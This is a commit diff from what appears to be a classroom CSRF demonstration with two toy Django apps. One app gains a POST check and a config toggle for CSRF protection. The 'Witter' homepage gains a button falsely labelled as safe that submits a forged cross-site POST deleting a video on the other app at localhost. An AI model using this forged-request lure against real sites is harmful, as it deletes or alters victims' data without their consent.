finalized the CRSF attack

TouYube/apps/TouYube/views.py

@@ -3,10 +3,11 @@ from uuid import UUID
 from django.contrib.auth import authenticate, login, logout
 from django.contrib.auth.decorators import login_required
 from django.core.handlers.wsgi import WSGIRequest
-from django.http import HttpResponse, HttpResponseForbidden
+from django.http import HttpResponse, HttpResponseForbidden, HttpResponseBadRequest
 from django.shortcuts import render, redirect, get_object_or_404
 
 from apps.TouYube import forms, models
+from configuration import settings
 
 
 def view_homepage(request: WSGIRequest) -> HttpResponse:
@@ -92,6 +93,10 @@ def view_video_delete(request: WSGIRequest, video_id: UUID) -> HttpResponse:
     Delete a video
     """
 
+    # check the method
+    if request.method != "POST":
+        return HttpResponseBadRequest()
+
     video = get_object_or_404(models.Video, id=video_id)
 
     # check if the user is the video's author

TouYube/configuration/settings.py

@@ -12,6 +12,8 @@ https://docs.djangoproject.com/en/5.0/ref/settings/
 
 from pathlib import Path
 
+from django.views.decorators.csrf import csrf_exempt
+
 # Build paths inside the project like this: BASE_DIR / 'subdir'.
 BASE_DIR = Path(__file__).resolve().parent.parent
 
@@ -50,7 +52,7 @@ MIDDLEWARE = [
     'django.contrib.sessions.middleware.SessionMiddleware',
     *(("corsheaders.middleware.CorsMiddleware",) if ENABLE_CROSS_ORIGIN_SECURITY else ()),
     "django.middleware.common.CommonMiddleware",
-    *(('django.middleware.csrf.CsrfViewMiddleware') if ENABLE_CROSS_ORIGIN_SECURITY else ()),
+    *(('django.middleware.csrf.CsrfViewMiddleware',) if ENABLE_CROSS_ORIGIN_SECURITY else ()),
     'django.contrib.auth.middleware.AuthenticationMiddleware',
     'django.contrib.messages.middleware.MessageMiddleware',
     *(('django.middleware.clickjacking.XFrameOptionsMiddleware',) if ENABLE_CROSS_ORIGIN_SECURITY else ()),
@@ -144,6 +146,5 @@ DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
 if not ENABLE_CROSS_ORIGIN_SECURITY:
     X_FRAME_OPTIONS = 'ALLOWALL'
 
-
 # Login Settings
 LOGIN_URL: str = "login/"

Witter/apps/Witter/templates/Witter/homepage.html

@@ -4,7 +4,23 @@
 {% block body %}
     <h1>Homepage</h1>
 
-    <a href="http://localhost:8080/video/delete/9cf5f8e6-9333-41de-a913-f4ec2e698a9d/">
+    <label>My favorite video's ID that I made: <input id="favorite-video-url" type="text" style="width: 32ch;"/></label>
-        Je suis un bouton qui ne va sûrement pas supprimer ta vidéo préférée 😊
+
-    </a>
+    <form id="attack-form" method="POST">
+        <button id="attack-submit-button">I am a very safe button that will not delete your video 😊</button>
+    </form>
+
+    <script>
+        // get the objects
+        attack_url_input = document.getElementById('favorite-video-url');
+        attack_form = document.getElementById("attack-form");
+        attack_button_click = document.getElementById("attack-submit-button");
+
+        // when the submit button is clicked, change the endpoint for the target video and send the form
+        // NOTE : this could be done with ANY EVENT (event loading the page), making simply visiting the website dangerous !
+        attack_button_click.addEventListener("click", () => {
+            attack_form.action = "http://localhost:8080/video/delete/"+attack_url_input.value+"/";
+            attack_form.submit();
+        });
+    </script>
 {% endblock %}